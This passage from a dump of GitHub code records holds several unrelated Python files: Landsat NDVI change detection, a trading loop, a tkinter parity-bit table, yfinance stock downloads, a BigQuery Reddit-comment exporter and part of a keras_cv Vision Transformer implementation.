ndvi[ndvi > 1] = 1\n    ndvi[ndvi < -1] = -1\n    kwargs = meta\n    # Update kwargs (change in data type)\n    kwargs.update(\n        driver='GTiff',\n        dtype=rasterio.float32,\n        count=1)\n    return ndvi, kwargs\n\n\ndef calc_ndvi(working_dir, output_dir):\n    \"\"\"\n    calculate NDVI value for Landsat 5 and Landsat 8 while only opening the bands needed from the archive\n    :param working_dir:\n    :param output_dir:\n    :return: none\n    \"\"\"\n    # create a list of only the tar files in the working directory\n    satellite_files = glob.glob(working_dir + '\\*.tar')\n    # loop over tar files and calculate NDVI from appropriate bands\n    for file in satellite_files:\n        name, ext = os.path.splitext(os.path.basename(file))\n        new_folder = os.path.join(working_dir, name)\n        if not os.path.exists(new_folder):\n            os.mkdir(new_folder)\n\n        # set up regex to grab appropriate files for satellite and unzip them for use\n        parts = os.path.basename(file).split(sep='_')\n        if parts[0] == 'LT05':\n            bands_grep = re.compile(\".*_(SRB3|SRB4)\\.tif\")\n        if parts[0] == 'LC08':\n            bands_grep = re.compile(\".*_(SRB4|SRB5)\\.tif\")\n        tar = tarfile.open(file)\n        file_list = tar.getnames()\n        bands = filter(lambda x: bands_grep.search(x), file_list)\n        data = []\n        for item in bands:\n            tar.extract(item, path=new_folder)\n            data.append(os.path.join(new_folder, item))\n\n        # read in data for red(absorption) and nir(reflectance) bands\n        with rasterio.open(data[0]) as src:\n            absorb_band = src.read(1)\n            meta = src.meta\n        with rasterio.open(data[1]) as src:\n            refl_band = src.read(1)\n\n        # Calculate NDVI\n        data, kwargs = process_VI(refl_band, absorb_band, meta)\n        ndvi_raster = os.path.join(output_dir, name + '_NDVI.tif')\n        with rasterio.open(ndvi_raster, 'w', **kwargs) as dst:\n            dst.write_band(1, data.astype(rasterio.float32))\n\n\ndef calc_max_ndvi(NDVI_folder, output_folder):\n    \"\"\"\n    collect all NDVI rasters created for a given year and stack into N dimensional array, then\n    write out the MAX value per pixel to a raster for that year\n    :param NDVI_folder: folder containing NDVI rasters\n    :param output_folder: output directory\n    :return: none\n    \"\"\"\n    ndvi_tifs = glob.glob(NDVI_folder + '\\*.tif')\n    # group tifs into year chunks using a dictionary key\n    # for years and list of rasters for that year as values\n    years = {}\n    for tif in ndvi_tifs:\n        file = os.path.basename(tif)\n        year = file[15:19]\n        if year not in years:\n            years[year] = [tif]\n        else:\n            years[year].append(tif)\n\n    # loop over each dictionary item and determine max value for each pixel\n    for year, tifs in years.items():\n        with rasterio.open(tifs[0]) as src:\n            kwargs = src.meta\n        kwargs.update(count=len(tifs))\n        with 
rasterio.open(os.path.join(output_folder, 'stack.tif'.format(year)), 'w+', **kwargs) as stack:\n for id, tif in enumerate(tifs, start=1):\n with rasterio.open(tif) as src:\n stack.write_band(id, src.read(1))\n stacked_rasters = stack.read()\n # determine max value per pixel and write to final raster\n kwargs.update(count=1)\n with rasterio.open(os.path.join(output_folder, 'NDVI_MAX_{}.tif'.format(year)), 'w', **kwargs) as dst:\n max_ndvi = numpy.max(stacked_rasters, axis=0)\n dst.write_band(1, max_ndvi)\n\n\ndef change_analysis(max_ndvi_dir, output_dir):\n \"\"\"\n creates a list of all max ndvi tifs and processes them into change rasters\n :param max_ndvi_dir: directory where max NDVI rasters have been created\n :param output_dir: output directory\n :return:\n \"\"\"\n # collect all MAX_NDVI rasters into a list and sort them in descending order\n max_ndvi_tifs = glob.glob(max_ndvi_dir + '\\\\NDVI_MAX_*.tif')\n sorted = max_ndvi_tifs.copy()\n sorted.reverse()\n # define a masking geometry of the county for clipping the final result\n with fiona.open(r\"D:\\BDA\\data\\Bulk Order 960972\\wake_county_mask__.shp\", \"r\") as shapefile:\n geoms = [feature[\"geometry\"] for feature in shapefile]\n out_crs = shapefile.crs\n while len(sorted) != 1:\n tifs = sorted[-2:]\n year1 = tifs[0][-8:-4]\n year2 = tifs[1][-8:-4]\n change_raster = subtract(tifs[0], tifs[1], out_crs, output_dir)\n # clip the change raster to the county line and mask out water bodies and agricultural parcels\n with rasterio.open(change_raster) as src:\n out_img, out_trans = mask(src, geoms, crop=True)\n kwargs = src.meta.copy()\n kwargs.update(\n driver='GTiff',\n height=out_img.shape[1],\n width=out_img.shape[2],\n transform=out_trans\n )\n with rasterio.open(os.path.join(output_dir, 'CHANGE_{}_{}.tif'.format(year1, year2)), 'w', **kwargs) as dst:\n dst.write(out_img)\n\n sorted.pop()\n\n\ndef subtract(time_newer, time_later, out_crs, output_dir):\n \"\"\"\n Subtract the older from the newer data and threshold values to 1 if below -0.25\n and 0 if anything else\n :param time_newer: raster representing the more recent data\n :param time_later: raster representing the older data\n :param out_crs: output coordinate reference system neeeded to set the output value\n :param output_dir: output directory\n :return:\n \"\"\"\n change_temp = os.path.join(output_dir, 'temp.tif')\n with rasterio.open(time_newer) as src:\n newer = src.read(1)\n kwargs = src.meta\n with rasterio.open(time_later) as src:\n later = src.read(1)\n kwargs.update(\n count=1,\n dtype=rasterio.uint8,\n crs=out_crs,\n nodata=0\n )\n change = (newer.astype(float) - later.astype(float))\n change[change > -0.25] = 0\n change[change <= -0.25] = 1\n change = change.astype(rasterio.uint8)\n with rasterio.open(change_temp, 'w', **kwargs) as dst:\n dst.write_band(1, change)\n return change_temp\n\n\ndef run(working_dir):\n try:\n # set up output directories\n output_ndvi, max_ndvi, change = build_folders(working_dir)\n # do work\n calc_ndvi(working_dir, output_ndvi)\n calc_max_ndvi(output_ndvi, max_ndvi)\n change_analysis(max_ndvi, change)\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n working_dir = r'D:\\BDA\\data\\Bulk Order 964143\\U.S. 
Landsat 4-8 ARD'\n run(working_dir)\n\n## placing the working directory of data downloaded from Earth Explorer as .tar files, the script\n## will process all data into the CHANGE folder resulting in change pixels within the county\n## excluding water bodies and agricultural lands.","repo_name":"WakeCountyGIS/NCSU_Collaboration","sub_path":"change_detection.py","file_name":"change_detection.py","file_ext":"py","file_size_in_byte":9618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7731171911","text":"from collections import defaultdict\nimport matplotlib.pyplot as plt\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport random\nimport time\nfrom .dataset import RESOLUTIONS\n\n\ndef start(self, robinhood, resolution='1d', until=None):\n 'Starts live trading\\n\\n Args:\\n robinhood: (Robinhood*) a robinhood client, that already has logged in\\n resolution: (str) the resolution/freq to trade at\\n until: (str) a timestamp at which to stop trading, defaults to forever\\n '\n assert (resolution in RESOLUTIONS)\n assert robinhood.logged_in\n self.rbh = robinhood\n self.resolution = resolution\n self.stop_date = until\n self.setup()\n while True:\n date_start = datetime.now()\n timestamp = date_start.isoformat()\n if (self.stop_date and (timestamp > self.stop_date)):\n break\n self._step(timestamp)\n date_end = (date_start + timedelta(seconds=RESOLUTIONS[self.resolution]))\n wait_time = (date_end - datetime.now()).total_seconds()\n if (wait_time <= 0):\n print(\"Your algo's loop took longer than a timestep!\")\n else:\n time.sleep(wait_time)\n self.clean_up()\n","repo_name":"menna161/API-Wizard","sub_path":"PyAroma/datasets/datetime/snippets/snippet913732.py","file_name":"snippet913732.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4340639415","text":"import tkinter as tk\nfrom tkinter import END, messagebox\n\n\ndef getDatosError(inputNumber,entry:tk.Entry): \n datoError = entry.get()\n cambios = 0\n for i in range(len(inputNumber)):\n if inputNumber[i] != datoError[i]:\n cambios += 1\n if cambios > 1: \n messagebox.showwarning(title=\"Error de ingreso\", message=\"Solo puede realizarse cambios en un bit\")\n datoError = inputNumber\n print(datoError)\n #Insertar aqui funcion para arreglar paridad\n\ndef table(input_number, tipo =\"paridad\", bit_change_num = 0):\n \n p1_indices = [0,2,4,6,8,10,12,14]\n p2_indices = [1,2,5,6,9,10,13,14]\n p4_indices = [3,4,5,6,11,12,13,14]\n p8_indices = [7,8,9,10,11,12,13,14]\n\n # Crear la ventana principal\n global t1\n t1 = ventana = tk.Tk()\n \n ventana.title(\"Tabla de Paridad\")\n # Crear la tabla\n tabla = tk.Frame(ventana)\n tabla.pack()\n\n # Crear los encabezados de columna\n encabezados_error = [\"Prueba\", \"Bit\"]\n encabezados = [\"\", \"p1\", \"p2\", \"d1\", \"p3\", \"d2\", \"d3\", \"d4\", \"p4\", \"d5\", \"d6\", \"d7\", \"d8\", \"d9\", \"d10\", \"d11\", \"d12\"]\n datos = [\"\",\"Sin paridad\", \"p1\", \"p2\", \"p3\", \"p4\", \"Con Paridad\"]\n\n \n for i in range (7):\n \n tk.Label(tabla, text=datos[i], font=\"Helvetica 14 bold\", borderwidth=1, relief=\"solid\", width=10, height=1).grid(row=i, column=0)\n\n for j in range(1, 17):\n tk.Label(tabla, text=\"\", borderwidth=1, relief=\"solid\", width=5, height=1).grid(row=i, column=j)\n\n if i == 0:\n tk.Label(tabla, text=encabezados[j], font=\"Helvetica 13 bold\", borderwidth=0, relief=\"solid\", width=5, 
height=1).grid(row=i, column=j)\n\n \n elif i == 1:\n if j in [1,2,4,8]:\n continue\n else:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n \n \n elif i == 2:\n par_index = -1\n if j-1 in p1_indices:\n par_index = p1_indices.index(j-1)\n \n if par_index >= 0:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n else:\n continue\n elif i == 3:\n par_index = -1\n if j-1 in p2_indices:\n par_index = p2_indices.index(j-1)\n\n if par_index >= 0:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n else:\n continue\n elif i == 4:\n par_index = -1\n if j-1 in p4_indices:\n par_index = p4_indices.index(j-1)\n\n if par_index >= 0:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n else:\n continue\n\n elif i == 5:\n par_index = -1\n if j-1 in p8_indices:\n par_index = p8_indices.index(j-1)\n \n if par_index >= 0:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n else:\n continue\n else:\n tk.Label(tabla, text=f\"{input_number[j-1]}\", borderwidth=0, relief=\"solid\").grid(row=i, column=j)\n if tipo == 'error':\n for j in range(17,19):\n if i == 0:\n tk.Label(tabla, text=encabezados_error[j-17], font=\"Helvetica 13 bold\", borderwidth=1, relief=\"solid\", width=10, height=1).grid(row=i, column=j)\n elif i == 1:\n continue\n else:\n idx = int(((j-16) * (2 ** (i-2)))) - 1\n if j == 17:\n if input_number[idx] == bit_change_num[idx]:\n tk.Label(tabla, text=\"Correcto\", font=\"Helvetica 13\", borderwidth=1, relief=\"solid\", width=10, height=1).grid(row=i, column=j)\n else:\n tk.Label(tabla, text=\"Error\", font=\"Helvetica 13\", borderwidth=1, relief=\"solid\", width=10, height=1).grid(row=i, column=j)\n tk.Label(tabla, text=bit_change_num[idx], font=\"Helvetica 13 bold\", borderwidth=1, relief=\"solid\", width=5, height=1).grid(row=i, column=idx+1)\n\n if j == 18:\n tk.Label(tabla, text=str(input_number[idx]), font=\"Helvetica 13\", borderwidth=1, relief=\"solid\", width=10, height=1).grid(row=i, column=j)\n t1.mainloop()\ndef reiniciar_ventana_t1():\n t1.destroy()\n \n\n\n\n\n\n\n","repo_name":"joseaam2020/P1DisenoLogico","sub_path":"tabla.py","file_name":"tabla.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6130073150","text":"\"\"\"This module contains functions for retrieving and saving historical\nstock data from Yahoo Finance.\n\nThe module provides functions for retrieving historical stock data for\nApple Inc., the S&P 500 Index, and the NASDAQ-100 Index from Yahoo Finance.\nIt also includes a function for saving a Pandas DataFrame as a CSV file\nto a specified directory.\n\nFunctions:\n- get_apple_data: retrieves historical stock data for Apple Inc.\n- get_snp_data: retrieves historical stock data for the S&P 500 Index.\n- get_nasdaq_data: retrieves historical stock data for the NASDAQ-100 Index.\n- save_locally: saves a Pandas DataFrame locally as a CSV file.\n\"\"\"\nimport os\nimport yfinance as yf\n\n\ndef get_apple_data():\n \"\"\"\n Retrieves historical stock data for Apple Inc. 
from Yahoo Finance.\n\n Args:\n None\n\n Returns:\n pandas.DataFrame:\n A DataFrame containing the historical stock data for Apple Inc.\n\n \"\"\"\n # create a Ticker object for Apple Inc.\n apple = yf.Ticker(\"AAPL\")\n\n # get the historical stock data for Apple Inc.\n aapl_stock = apple.history(start=\"2017-04-01\", end=\"2022-05-31\", interval=\"1d\")\n\n # reset the index of the DataFrame\n aapl_stock.reset_index(inplace=True)\n\n # return the DataFrame containing the stock data\n return aapl_stock\n\n\ndef get_snp_data():\n \"\"\"\n Retrieves historical stock data for the S&P 500 Index from Yahoo Finance.\n\n Args:\n None\n\n Returns:\n pandas.DataFrame:\n A DataFrame containing the historical stock data for the S&P 500 Index.\n\n \"\"\"\n # create a Ticker object for the S&P 500 Index\n snp = yf.Ticker(\"SPY\")\n\n # get the historical stock data for the S&P 500 Index\n snp_stock = snp.history(start=\"2017-04-01\", end=\"2022-05-31\", interval=\"1d\")\n\n # reset the index of the DataFrame\n snp_stock.reset_index(inplace=True)\n\n # return the DataFrame containing the stock data\n return snp_stock\n\n\ndef get_nasdaq_data():\n \"\"\"\n Retrieves historical stock data for the NASDAQ-100 Index from Yahoo Finance.\n\n Args:\n None\n\n Returns:\n pandas.DataFrame:\n A DataFrame containing the historical stock data for the NASDAQ-100 Index.\n\n \"\"\"\n # create a Ticker object for the NASDAQ-100 Index\n nasdaq = yf.Ticker(\"QQQ\")\n\n # get the historical stock data for the NASDAQ-100 Index\n nasdaq_stock = nasdaq.history(start=\"2017-04-01\", end=\"2022-05-31\", interval=\"1d\")\n\n # reset the index of the DataFrame\n nasdaq_stock.reset_index(inplace=True)\n\n # return the DataFrame containing the stock data\n return nasdaq_stock\n\n\ndef save_locally(data, directory):\n \"\"\"\n Saves a Pandas DataFrame locally as a CSV file.\n\n Args:\n data: A Pandas DataFrame to be saved.\n dir: The directory where the CSV file should be saved.\n\n Returns:\n None\n\n Example Usage:\n stock_data = pd.read_csv('stock_data.csv')\n save_locally(stock_data, 'C:/Users/MyUser/Documents/stock_data.csv')\n \"\"\"\n if not os.path.exists(directory):\n data.to_csv(directory)\n print(\"Data saved locally to: \" + directory)\n else:\n print(\"Data already exists locally at: \" + directory)\n","repo_name":"moshesimon/DAPS_Assignment_2023","sub_path":"Aquisition/stock_data.py","file_name":"stock_data.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7162317751","text":"from google.cloud import bigquery\nimport json\n\nclass BigQueryClient:\n \"\"\" Extracts data from Google BigQuery\n This class will not function without the json key. 
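    A minimal usage sketch, relying only on the constructor and run_query defined
    below (the key path and row limit are illustrative):
        client = BigQueryClient(key_path='key.json')
        rows = client.run_query(BigQueryClient.query, limit=10)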
\n \"\"\"\n\n query = 'SELECT * FROM `fh-bigquery.reddit_comments.2015_01` '\n\n def __init__(self, key_path = None):\n if key_path is None:\n key_path = 'key.json'\n self.bigquery_client = bigquery.Client.from_service_account_json(key_path)\n\n def run_query(self, query, limit = None):\n \"\"\"\n Performs a BigQuery query.\n \"\"\"\n if limit is not None:\n query += 'LIMIT ' + str(limit)\n query_job = self.bigquery_client.query(query) # API request\n return query_job.result() # Waits for query to finish\n\n def produce_json_data(self, producer, limit = None):\n \"\"\"\n Runs a query and converts the result into a json object.\n \"\"\"\n raw_data = self.run_query(BigQueryClient.query, limit)\n for row in raw_data:\n json_data = self.__data_row_to_json(row)\n producer.send_data(json_data)\n\n\n def __data_row_to_json(self, row):\n \"\"\"\n Converts data inside a row iterator to a json object.\n \"\"\"\n raw_data = {}\n raw_data[\"body\"] = row.body\n raw_data[\"score_hidden\"] = row.score_hidden\n raw_data[\"archived\"] = row.archived\n raw_data[\"name\"] = row.name\n raw_data[\"author\"] = row.author\n raw_data[\"author_flair_text\"] = row.author_flair_text\n raw_data[\"downs\"] = row.downs\n raw_data[\"created_utc\"] = row.created_utc\n raw_data[\"subreddit_id\"] = row.subreddit_id\n raw_data[\"link_id\"] = row.link_id\n raw_data[\"parent_id\"] = row.parent_id\n raw_data[\"score\"] = row.score\n raw_data[\"retrieved_on\"] = row.retrieved_on\n raw_data[\"controversiality\"] = row.controversiality\n raw_data[\"gilded\"] = row.gilded\n raw_data[\"id\"] = row.id\n raw_data[\"subreddit\"] = row.subreddit\n raw_data[\"ups\"] = row.ups\n raw_data[\"distinguished\"] = row.distinguished\n raw_data[\"author_flair_css_class\"] = row.author_flair_css_class\n\n return json.dumps(raw_data)\n","repo_name":"anduinsay/StickComments","sub_path":"extraction/big_query_client.py","file_name":"big_query_client.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5865288449","text":" # noqa: E501\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nfrom keras_cv.layers import TransformerEncoder\nfrom keras_cv.layers.vit_layers import PatchingAndEmbedding\nfrom keras_cv.models.legacy import utils\nfrom keras_cv.models.legacy.weights import parse_weights\n\nMODEL_CONFIGS = {\n \"ViTTiny16\": {\n \"patch_size\": 16,\n \"transformer_layer_num\": 12,\n \"project_dim\": 192,\n \"mlp_dim\": 768,\n \"num_heads\": 3,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTS16\": {\n \"patch_size\": 16,\n \"transformer_layer_num\": 12,\n \"project_dim\": 384,\n \"mlp_dim\": 1536,\n \"num_heads\": 6,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTB16\": {\n \"patch_size\": 16,\n \"transformer_layer_num\": 12,\n \"project_dim\": 768,\n \"mlp_dim\": 3072,\n \"num_heads\": 12,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTL16\": {\n \"patch_size\": 16,\n \"transformer_layer_num\": 24,\n \"project_dim\": 1024,\n \"mlp_dim\": 4096,\n \"num_heads\": 16,\n \"mlp_dropout\": 0.1,\n \"attention_dropout\": 0.0,\n },\n \"ViTH16\": {\n \"patch_size\": 16,\n \"transformer_layer_num\": 32,\n \"project_dim\": 1280,\n \"mlp_dim\": 5120,\n \"num_heads\": 16,\n \"mlp_dropout\": 0.1,\n \"attention_dropout\": 0.0,\n },\n \"ViTTiny32\": {\n \"patch_size\": 32,\n \"transformer_layer_num\": 12,\n \"project_dim\": 192,\n \"mlp_dim\": 768,\n 
\"num_heads\": 3,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTS32\": {\n \"patch_size\": 32,\n \"transformer_layer_num\": 12,\n \"project_dim\": 384,\n \"mlp_dim\": 1536,\n \"num_heads\": 6,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTB32\": {\n \"patch_size\": 32,\n \"transformer_layer_num\": 12,\n \"project_dim\": 768,\n \"mlp_dim\": 3072,\n \"num_heads\": 12,\n \"mlp_dropout\": 0.0,\n \"attention_dropout\": 0.0,\n },\n \"ViTL32\": {\n \"patch_size\": 32,\n \"transformer_layer_num\": 24,\n \"project_dim\": 1024,\n \"mlp_dim\": 4096,\n \"num_heads\": 16,\n \"mlp_dropout\": 0.1,\n \"attention_dropout\": 0.0,\n },\n \"ViTH32\": {\n \"patch_size\": 32,\n \"transformer_layer_num\": 32,\n \"project_dim\": 1280,\n \"mlp_dim\": 5120,\n \"num_heads\": 16,\n \"mlp_dropout\": 0.1,\n \"attention_dropout\": 0.0,\n },\n}\n\nBASE_DOCSTRING = \"\"\"Instantiates the {name} architecture.\n Reference:\n - [An Image is Worth 16x16 Words: Transformers for Image Recognition at Scale](https://arxiv.org/abs/2010.11929v2)\n (ICLR 2021)\n This function returns a Keras {name} model.\n\n The naming convention of ViT models follows: ViTSize_Patch-size\n (i.e. ViTS16).\n The following sizes were released in the original paper:\n - S (Small)\n - B (Base)\n - L (Large)\n But subsequent work from the same authors introduced:\n - Ti (Tiny)\n - H (Huge)\n\n The parameter configurations for all of these sizes, at patch sizes 16 and\n 32 are made available, following the naming convention laid out above.\n\n For transfer learning use cases, make sure to read the\n [guide to transfer learning & fine-tuning](https://keras.io/guides/transfer_learning/).\n Args:\n include_rescaling: bool, whether to rescale the inputs. If set to\n True, inputs will be passed through a `Rescaling(scale=1./255.0)`\n layer. Note that ViTs expect an input range of `[0..1]` if rescaling\n isn't used. Regardless of whether you supply `[0..1]` or the input\n is rescaled to `[0..1]`, the inputs will further be rescaled to\n `[-1..1]`.\n include_top: bool, whether to include the fully-connected layer at the\n top of the network. If provided, num_classes must be provided.\n num_classes: optional int, number of classes to classify images into,\n only to be specified if `include_top` is True.\n weights: one of `None` (random initialization), a pretrained weight file\n path, or a reference to pre-trained weights\n (e.g. 'imagenet/classification') (see available pre-trained weights\n in weights.py). Note that the 'imagenet' weights only work on an\n input shape of (224, 224, 3) due to the input shape dependent\n patching and flattening logic.\n input_shape: optional shape tuple, defaults to (None, None, 3).\n input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)\n to use as image input for the model.\n pooling: optional pooling mode for feature extraction\n when `include_top` is `False`.\n - `None` means that the output of the model will be the 4D tensor\n output of the last convolutional block.\n - `avg` means that global average pooling will be applied to the\n output of the last convolutional block, and thus the output of\n the model will be a 2D tensor.\n - `max` means that global max pooling will be applied.\n - `token_pooling`, default, means that the token at the start of the\n sequences is used instead of regular pooling.\n name: (Optional) name to pass to the model, defaults to \"{name}\".\n classifier_activation: A `str` or callable. The activation function to\n use on the \"top\" layer. 
Ignored unless `include_top=True`. Set\n `classifier_activation=None` to return the logits of the \"top\"\n layer.\n Returns:\n A `keras.Model` instance.\n\"\"\" # noqa: E501\n\n\n@keras.utils.register_keras_serializable(package=\"keras_cv.models\")\nclass ViT(keras.Model):\n \"\"\"Instantiates the ViT architecture.\n\n Args:\n mlp_dim: the dimensionality of the hidden Dense layer in the transformer\n MLP head\n include_rescaling: bool, whether to rescale the inputs. If set to\n True, inputs will be passed through a `Rescaling(1/255.0)` layer.\n name: string, model name.\n include_top: bool, whether to include the fully-connected\n layer at the top of the network.\n weights: one of `None` (random initialization),\n or the path to the weights file to be loaded.\n input_shape: optional shape tuple, defaults to (None, None, 3).\n input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)\n to use as image input for the model.\n pooling: optional pooling mode for feature extraction\n when `include_top` is `False`.\n - `None` means that the output of the model will be\n the 4D tensor output of the\n last convolutional layer.\n - `avg` means that global average pooling\n will be applied to the output of the\n last convolutional layer, and thus\n the output of the model will be a 2D tensor.\n - `max` means that global max pooling will\n be applied.\n - `token_pooling`, default, means that the token at the start of the\n sequences is used instead of regular pooling.\n num_classes: optional number of classes to classify images\n into, only to be specified if `include_top` is True.\n mlp_dim:\n project_dim: the latent dimensionality to be projected into in the\n output of each stacked transformer encoder\n activation: the activation function to use in the first `layers.Dense`\n layer in the MLP head of the transformer encoder\n attention_dropout: the dropout rate to apply to the `MultiHeadAttention`\n in each transformer encoder\n mlp_dropout: the dropout rate to apply between `layers.Dense` layers\n in the MLP head of the transformer encoder\n num_heads: the number of heads to use in the `MultiHeadAttention` layer\n of each transformer encoder\n transformer_layer_num: the number of transformer encoder layers to stack\n in the Vision Transformer\n patch_size: the patch size to be supplied to the Patching layer to turn\n input images into a flattened sequence of patches\n classifier_activation: A `str` or callable. The activation function to\n use on the \"top\" layer. Ignored unless `include_top=True`. Set\n `classifier_activation=None` to return the logits of the \"top\"\n layer.\n **kwargs: Pass-through keyword arguments to `keras.Model`.\n \"\"\"\n\n def __init__(\n self,\n include_rescaling,\n include_top,\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n patch_size=None,\n transformer_layer_num=None,\n num_heads=None,\n mlp_dropout=None,\n attention_dropout=None,\n activation=None,\n project_dim=None,\n mlp_dim=None,\n classifier_activation=\"softmax\",\n **kwargs,\n ):\n if weights and not tf.io.gfile.exists(weights):\n raise ValueError(\n \"The `weights` argument should be either `None` or the path \"\n \"to the weights file to be loaded. Weights file not found at \"\n \"location: {weights}\"\n )\n\n if include_top and not num_classes:\n raise ValueError(\n \"If `include_top` is True, you should specify `num_classes`. 
\"\n f\"Received: num_classes={num_classes}\"\n )\n\n if include_top and pooling:\n raise ValueError(\n f\"`pooling` must be `None` when `include_top=True`.\"\n f\"Received pooling={pooling} and include_top={include_top}. \"\n )\n\n inputs = utils.parse_model_inputs(input_shape, input_tensor)\n x = inputs\n\n if include_rescaling:\n x = layers.Rescaling(1.0 / 255.0, name=\"rescaling\")(x)\n\n # The previous layer rescales [0..255] to [0..1] if applicable\n # This one rescales [0..1] to [-1..1] since ViTs expect [-1..1]\n x = layers.Rescaling(scale=1.0 / 0.5, offset=-1.0, name=\"rescaling_2\")(\n x\n )\n\n encoded_patches = PatchingAndEmbedding(project_dim, patch_size)(x)\n encoded_patches = layers.Dropout(mlp_dropout)(encoded_patches)\n\n for _ in range(transformer_layer_num):\n encoded_patches = TransformerEncoder(\n project_dim=project_dim,\n mlp_dim=mlp_dim,\n num_heads=num_heads,\n mlp_dropout=mlp_dropout,\n attention_dropout=attention_dropout,\n activation=activation,\n )(encoded_patches)\n\n output = layers.LayerNormalization(epsilon=1e-6)(encoded_patches)\n\n if include_top:\n output = output[:, 0]\n output = layers.Dense(\n num_classes, activation=classifier_activation\n )(output)\n\n elif pooling == \"token_pooling\":\n output = output[:, 0]\n elif pooling == \"avg\":\n output = layers.GlobalAveragePooling1D()(output)\n\n # Create model.\n super().__init__(inputs=inputs, outputs=output, **kwargs)\n\n if weights is not None:\n self.load_weights(weights)\n\n self.include_rescaling = include_rescaling\n self.include_top = include_top\n self.input_tensor = input_tensor\n self.pooling = pooling\n self.num_classes = num_classes\n self.patch_size = patch_size\n self.transformer_layer_num = transformer_layer_num\n self.num_heads = num_heads\n self.mlp_dropout = mlp_dropout\n self.attention_dropout = attention_dropout\n self.activation = activation\n self.project_dim = project_dim\n self.mlp_dim = mlp_dim\n self.classifier_activation = classifier_activation\n\n def get_config(self):\n return {\n \"include_rescaling\": self.include_rescaling,\n \"include_top\": self.include_top,\n \"name\": self.name,\n \"input_shape\": self.input_shape[1:],\n \"input_tensor\": self.input_tensor,\n \"pooling\": self.pooling,\n \"num_classes\": self.num_classes,\n \"patch_size\": self.patch_size,\n \"transformer_layer_num\": self.transformer_layer_num,\n \"num_heads\": self.num_heads,\n \"mlp_dropout\": self.mlp_dropout,\n \"attention_dropout\": self.attention_dropout,\n \"activation\": self.activation,\n \"project_dim\": self.project_dim,\n \"mlp_dim\": self.mlp_dim,\n \"classifier_activation\": self.classifier_activation,\n \"trainable\": self.trainable,\n }\n\n @classmethod\n def from_config(cls, config):\n return cls(**config)\n\n\ndef ViTTiny16(\n *,\n include_rescaling,\n include_top,\n name=\"ViTTiny16\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTTiny16 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=parse_weights(weights, include_top, \"vittiny16\"),\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTTiny16\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTTiny16\"][\n \"transformer_layer_num\"\n ],\n project_dim=MODEL_CONFIGS[\"ViTTiny16\"][\"project_dim\"],\n 
mlp_dim=MODEL_CONFIGS[\"ViTTiny16\"][\"mlp_dim\"],\n        num_heads=MODEL_CONFIGS[\"ViTTiny16\"][\"num_heads\"],\n        mlp_dropout=MODEL_CONFIGS[\"ViTTiny16\"][\"mlp_dropout\"],\n        attention_dropout=MODEL_CONFIGS[\"ViTTiny16\"][\"attention_dropout\"],\n        activation=activation,\n        classifier_activation=classifier_activation,\n        **kwargs,\n    )\n\n\ndef ViTS16(\n    *,\n    include_rescaling,\n    include_top,\n    name=\"ViTS16\",\n    weights=None,\n    input_shape=(None, None, 3),\n    input_tensor=None,\n    pooling=None,\n    num_classes=None,\n    activation=keras.activations.gelu,\n    classifier_activation=\"softmax\",\n    **kwargs,\n):\n    \"\"\"Instantiates the ViTS16 architecture.\"\"\"\n\n    return ViT(\n        include_rescaling,\n        include_top,\n        name=name,\n        weights=parse_weights(weights, include_top, \"vits16\"),\n        input_shape=input_shape,\n        input_tensor=input_tensor,\n        pooling=pooling,\n        num_classes=num_classes,\n        patch_size=MODEL_CONFIGS[\"ViTS16\"][\"patch_size\"],\n        transformer_layer_num=MODEL_CONFIGS[\"ViTS16\"][\"transformer_layer_num\"],\n        project_dim=MODEL_CONFIGS[\"ViTS16\"][\"project_dim\"],\n        mlp_dim=MODEL_CONFIGS[\"ViTS16\"][\"mlp_dim\"],\n        num_heads=MODEL_CONFIGS[\"ViTS16\"][\"num_heads\"],\n        mlp_dropout=MODEL_CONFIGS[\"ViTS16\"][\"mlp_dropout\"],\n        attention_dropout=MODEL_CONFIGS[\"ViTS16\"][\"attention_dropout\"],\n        activation=activation,\n        classifier_activation=classifier_activation,\n        **kwargs,\n    )\n\n\ndef ViTB16(\n    *,\n    include_rescaling,\n    include_top,\n    name=\"ViTB16\",\n    